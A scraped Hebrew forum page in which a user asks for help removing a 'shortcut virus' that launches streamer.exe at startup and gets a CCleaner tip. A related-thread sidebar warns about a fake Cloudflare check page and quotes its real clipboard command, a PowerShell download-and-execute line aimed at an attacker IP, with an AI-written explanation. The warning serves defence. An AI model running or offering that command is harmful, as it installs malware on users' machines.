וירוס קיצור דרך והודעות קופצות- לא מצליח להיפטר

הירשם עכשיו!
  • הוסף לסימניות
  • #1
שלום.
יש לי כמה מחשבים, ולאחרונה הוירוס הידוע לשימצה (וירוס קיצור דרך) השתולל ועבר מאחד לשני. בעזרת הפורום, וקריאת (אולי "כל") האשכולות בעניין זה, הצלחתי להיפטר ממנו, מלבד 2 מחשבים שבהם הוא מסרב לצאת, אף שביצעתי את האמור באשכולות קודמים.
אשמח למי שיכול לעזור לי בפתרון ספציפי:
מחשב 1: אכן המחשב לא מייצר קיצורי דרך בהתקנים, אך כל פעם שאני מדליק אותו קופץ לי מסך- מסך שחור+ הודעה (מופיע בתמונה מס' 1). בתחילה קפץ רק הריבוע השחור (c:\windows\system32\cmd.exe) לחצי שניה בהדלקת המחשב ונעלם- (הקובץ קיים בתקיית היעד הנ"ל בתקיות מוסתרות), ובמקביל קפץ חלון קטן (c:\streamer\streamer.exe)- מחקתי קובץ זה, ומאז קופץ לי בצורה הנ"ל (תמונה מס' 1).
מחשב 2: מחשב זה ממשיך לייצר לי קיצורי דרך רק בהתקנים חיצוניים (ולא בכונן של המחשב)- כל תיקיה בהתקן, מקבלת קיצור דרך על שמה. בנוסף, בהדלקת המחשב קופץ ריבוע שחור (c:\streamer\streamer.exe) ונעלם מיד- קובץ זה קיים בתיקיה מוסתרת ביעד הנ"ל (מצורף בתמונה מס' 2) ניסיתי למחוק קובץ זה כמו במחשב הראשון, אך כותב לי שא"א כיון שהקובץ פתוח ב"ultra Virus" וכו'- אני מצרף בתמונה מס' 3 צילום של מנהל המשימות למחשב זה.
ניסיתי להפעיל את כל הקבצים והתוכנות שראיתי בכמה אשכולות כאן, ולא עזר !
תודה מראש
 

קבצים מצורפים

  • 1.PNG
    1.PNG
    KB 69.8 · צפיות: 93
  • 2.PNG
    2.PNG
    KB 20.7 · צפיות: 88
  • 3.PNG
    3.PNG
    KB 89.3 · צפיות: 78
  • הוסף לסימניות
  • #2
חפש בפורום תוכנות שמוצף בנושא הזה
 
  • הוסף לסימניות
  • #4
  • הוסף לסימניות
  • #5
לגבי מחשב 1 זה פשוט
תתקין ccleaner
כלים>אתחול
ברשימת האתחול מופיע כל מה שעולה בכניסה למחשב תחפש את הנתיב שמופיע באזהרה ותמחק
הסבר: הוירוס נתן פקודה להפעלה אוטומטית וכיון שמחקת את הוירוס המחשב לא מוצא את הקובץ אותו הוא צריך להעלות אוטומטית.
 

פרוגבוט

תוכן שיווקי
פרסומת
עליך להתחבר או להירשם כדי להשיב כאן.

פוסטים חדשים שאולי לא קראת....

    • שאלה
    6
    • prog
    בטחוני פיקוד העורף: צפי לשיגורים למרכז והדרום
  • prog //
    • דובר צהל מזהיר הערב יש צפי לשיגורים לעבר מרכז ודרום הארץ
    3 תגובות
    לכל התגובות
     תגובה אחרונה 
    prog
    prog
    יש להשמע להנחיות פיקוד העורף
    • שאלה
    27
    • prog
    בטחוני אירוע בטחוני בבני ברק
  • prog //
    • נפל טיל ברחוב אביי ורבא. יש הרס רב
    8 תגובות
    לכל התגובות
     תגובה אחרונה 
    prog
    prog
    יש נפילות נוספות גם בפתח תקווה

    אשכולות דומים

  • 2 507
    • משה פפירוב
    מידע שימושי זהירות! וירוס בתחפושת!
  • משה פפירוב //
    • ניסיתי להכנס לאתר של הרב אפרתי - נותן הכשרות
    לאחר לחיצה על סימון - אתה לא רובוט...

    הופתעתי מאוד לראות את זה:
    1773765478164.png
    נראה חשוד!

    מאוד חשוד!!!

    ‫Gemini אמר​

    אזהרה: מדובר בהונאה ובתוכנה זדונית (Malware)

    התמונה שצירפת מציגה דף מזויף שמתחזה לשירות ההגנה Cloudflare, אך למעשה מדובר בשיטה להרצת קוד זדוני על המחשב שלך.

    למה זה מסוכן?

    ההוראות בתמונה מבקשות ממך לבצע רצף פעולות חריג מאוד:
    1. צירוף המקשים Win + R: פותח את חלון ה-"הפעלה" (Run) של ווינדוס, שמשמש להרצת פקודות מערכת.
    2. צירוף המקשים Ctrl + V: מדביק פקודה שהאתר העתיק ללוח הגזירים (Clipboard) שלך באופן אוטומטי ברגע שנכנסת לדף או לחצת על כפתור.
    3. לחיצה על OK: מריצה את הפקודה המודבקת.
    מה קורה בפועל?ברגע שתלחץ על OK, המחשב יריץ פקודה (בדרך כלל פקודת PowerShell) שמורידה ומתקינה וירוס, תוכנת כופר או תוכנה לגניבת סיסמאות ופרטי בנק. אף שירות אימות לגיטימי (כמו Cloudflare) לא יבקש ממך להריץ פקודות ידניות בחלון ה-Run של המערכת.


    מה עליך לעשות?

    • אל תבצע את ההוראות: אל תקיש על שום שילוב מקשים ואל תדביק דבר.
    • סגור את הלשונית מיד: צא מהאתר הזה ואל תחזור אליו.
    • סריקת וירוסים: מומלץ להריץ סריקה מלאה של האנטי-וירוס במחשב שלך (כמו Windows Defender או תוכנה מוכרת אחרת) ליתר ביטחון.
    • ניקוי היסטוריה: כדאי לנקות את הקבצים הזמניים והקוקיז בדפדפן.

    בדקתי בלוח מה הפקודה שהוא רצה שאני אריץ במחשב....
    זה הפקודה: powershell -c iex(irm 158.94.209.33 -UseBasicParsing) - סכנה! לא להריץ בשום אופן!!!!

    תקראו טוב מה גיימני כותב שזה עושה למחשב שלכם...

    זהירות! מדובר בתוכנה זדונית (Malware) ודאית.

    הפקודה שהעתקת היא הוכחה חותכת לכך שמדובר בניסיון פריצה. בוא נפרק את הפקודה כדי שתבין בדיוק מה היא מנסה לעשות למחשב שלך:

    • powershell: מפעיל את ממשק הפקודות המתקדם של ווינדוס. לממשק זה יש הרשאות עמוקות לשינוי הגדרות מערכת.
    • iex (Invoke-Expression): פקודה שאומרת למחשב: "כל מה שתקבל בהמשך – תריץ אותו כקוד עכשיו".
    • irm (Invoke-RestMethod): פקודה להורדת תוכן מהאינטרנט.
    • 158.94.209.33: זוהי כתובת IP של שרת מרוחק (שאינו קשור ל-Cloudflare). הפקודה מנסה למשוך קובץ "תסריט" (Script) מהשרת הזה.
    • -UseBasicParsing: הוראה לדפדפן הפנימי להתעלם מבדיקות תאימות ולהריץ את הקוד במהירות.


    מה המשמעות?

    ברגע שהיית לוחץ על OK, המחשב שלך היה פונה לכתובת ה-IP הזו, מוריד קוד זדוני (כמו סוס טרויאני או תוכנת כופר) ומריץ אותו מיד ברקע, בלי שתראה חלון נוסף או אזהרה.

    צעדים דחופים אם כבר הרצת את הפקודה:

    1. ניתוק מהאינטרנט: כבה את ה-Wi-Fi או נתק את כבל הרשת מיד כדי למנוע מהווירוס לשלוח מידע החוצה או להוריד רכיבים נוספים.
    2. סריקה במצב בטוח: הפעל את המחשב ב-"מצב בטוח" (Safe Mode) והרץ סריקה מלאה של אנטי-וירוס מעודכן.
    3. שינוי סיסמאות: ממכשיר אחר (טלפון או מחשב נקי), שנה סיסמאות לחשבונות רגישים (מייל, בנק, רשתות חברתיות).


    אוסיף שבדקתי את הכתובת שהפקודה פונה אליה
    באתר בדיקת כתובות אינטרנט - האם הן וירוס
    הנה הקישור לבדיקה:     https://www.virustotal.com/gui/url/bd5456fb856d9b4d0d4cea1c68edf7e1793e6a72fb9ac037f4f05d1bba65c18c
    מוזמנים לראות את התוצאה....
    לחצ/י כדי להרחיב...


    מסקנה:

    זהירות!!!
    1773765478164.png
    • תודה
    • שכוייח!
    • וואו!
    Reactions: יעקב ויצמן, בלת"ק (:, תשעים ותשע ועוד 24 משתמשים27 //
    20 תגובות
    לכל התגובות
     תגובה אחרונה 
    5
    5566brs
    ניתוח מלא של הוירוס קיים כאן נכון לעכשיו הוירוס עדיין פעיל בחלק מהכתובות המופיעות שם, אבל חלק...
    פרסום בפרוג ←

    הצטרפות לניוזלטר

    מאשר/ת קבלת תוכן חם למייל
    בשליחת הטופס אני מסכים/ה שבית פרוג תשתמש במידע למטרות שיווק, דיוור ישיר ומשלוח פרסומות באמצעי הקשר שמסרתי, ותכלול אותו במאגר המידע של החברה, והכל בכפוף למדיניות הפרטיות של החברה.
    להסרה בעתיד פנה/י לדוא"ל office@prog.co.il או לטלפון: 072-2201430

    איזה כיף שהצטרפתם לניוזלטר שלנו!

    מעכשיו, תהיו הראשונים לקבל את כל העדכונים, החדשות, ההפתעות בלעדיות, והתכנים הכי חמים שלנו בפרוג!

    לוח לימודים

    מסלולי לימוד שאפשר להצטרף
    אליהם ממש עכשיו:

    26.04

    ט' אייר


    קורס עימוד ועיצוב ספרים

    ההרשמה בעיצומה

    30.04

    י"ג אייר


    קורס בוטים ואוטומציות עיסקיות

    ההרשמה בעיצומה

    10.05

    כ"ג אייר


    קורס שיווק ופרסום דיגיטלי

    נפתחה ההרשמה

    14.05

    כ"ז אייר


    קורס שמאות רכוש

    נפתחה ההרשמה

    14.06

    כ"ט סיוון


    קורס אדריכלות עיצוב פנים

    נפתחה ההרשמה
    לכל מסלולי הלימוד

    לוח מודעות

    הפרק היומי

    הפרק היומי! כל ערב פרק תהילים חדש. הצטרפו אלינו לקריאת תהילים משותפת!


    תהילים פרק כה

    אלְדָוִד אֵלֶיךָ יי נַפְשִׁי אֶשָּׂא:באֱלֹהַי בְּךָ בָטַחְתִּי אַל אֵבוֹשָׁה אַל יַעַלְצוּ אֹיְבַי לִי:גגַּם כָּל קוֶֹיךָ לֹא יֵבֹשׁוּ יֵבֹשׁוּ הַבּוֹגְדִים רֵיקָם:דדְּרָכֶיךָ יי הוֹדִיעֵנִי אֹרְחוֹתֶיךָ לַמְּדֵנִי:ההַדְרִיכֵנִי בַאֲמִתֶּךָ וְלַמְּדֵנִי כִּי אַתָּה אֱלֹהֵי יִשְׁעִי אוֹתְךָ קִוִּיתִי כָּל הַיּוֹם:וזְכֹר רַחֲמֶיךָ יי וַחֲסָדֶיךָ כִּי מֵעוֹלָם הֵמָּה:זחַטֹּאות נְעוּרַי וּפְשָׁעַי אַל תִּזְכֹּר כְּחַסְדְּךָ זְכָר לִי אַתָּה לְמַעַן טוּבְךָ יי:חטוֹב וְיָשָׁר יי עַל כֵּן יוֹרֶה חַטָּאִים בַּדָּרֶךְ:טיַדְרֵךְ עֲנָוִים בַּמִּשְׁפָּט וִילַמֵּד עֲנָוִים דַּרְכּוֹ:יכָּל אָרְחוֹת יי חֶסֶד וֶאֱמֶת לְנֹצְרֵי בְרִיתוֹ וְעֵדֹתָיו:יאלְמַעַן שִׁמְךָ יי וְסָלַחְתָּ לַעֲוֹנִי כִּי רַב הוּא:יבמִי זֶה הָאִישׁ יְרֵא יי יוֹרֶנּוּ בְּדֶרֶךְ יִבְחָר:יגנַפְשׁוֹ בְּטוֹב תָּלִין וְזַרְעוֹ יִירַשׁ אָרֶץ:ידסוֹד יי לִירֵאָיו וּבְרִיתוֹ לְהוֹדִיעָם:טועֵינַי תָּמִיד אֶל יי כִּי הוּא יוֹצִיא מֵרֶשֶׁת רַגְלָי:טזפְּנֵה אֵלַי וְחָנֵּנִי כִּי יָחִיד וְעָנִי אָנִי:יזצָרוֹת לְבָבִי הִרְחִיבוּ מִמְּצוּקוֹתַי הוֹצִיאֵנִי:יחרְאֵה עָנְיִי וַעֲמָלִי וְשָׂא לְכָל חַטֹּאותָי:יטרְאֵה אוֹיְבַי כִּי רָבּוּ וְשִׂנְאַת חָמָס שְׂנֵאוּנִי:כשָׁמְרָה נַפְשִׁי וְהַצִּילֵנִי אַל אֵבוֹשׁ כִּי חָסִיתִי בָךְ:כאתֹּם וָיֹשֶׁר יִצְּרוּנִי כִּי קִוִּיתִיךָ:כבפְּדֵה אֱלֹהִים אֶת יִשְׂרָאֵל מִכֹּל צָרוֹתָיו:
    סמן אחרי הקריאה
    לקריאה בפורום
    נקרא  2  פעמים
    פיקוח של ועדת הרבנים 'שמור'
    למעלה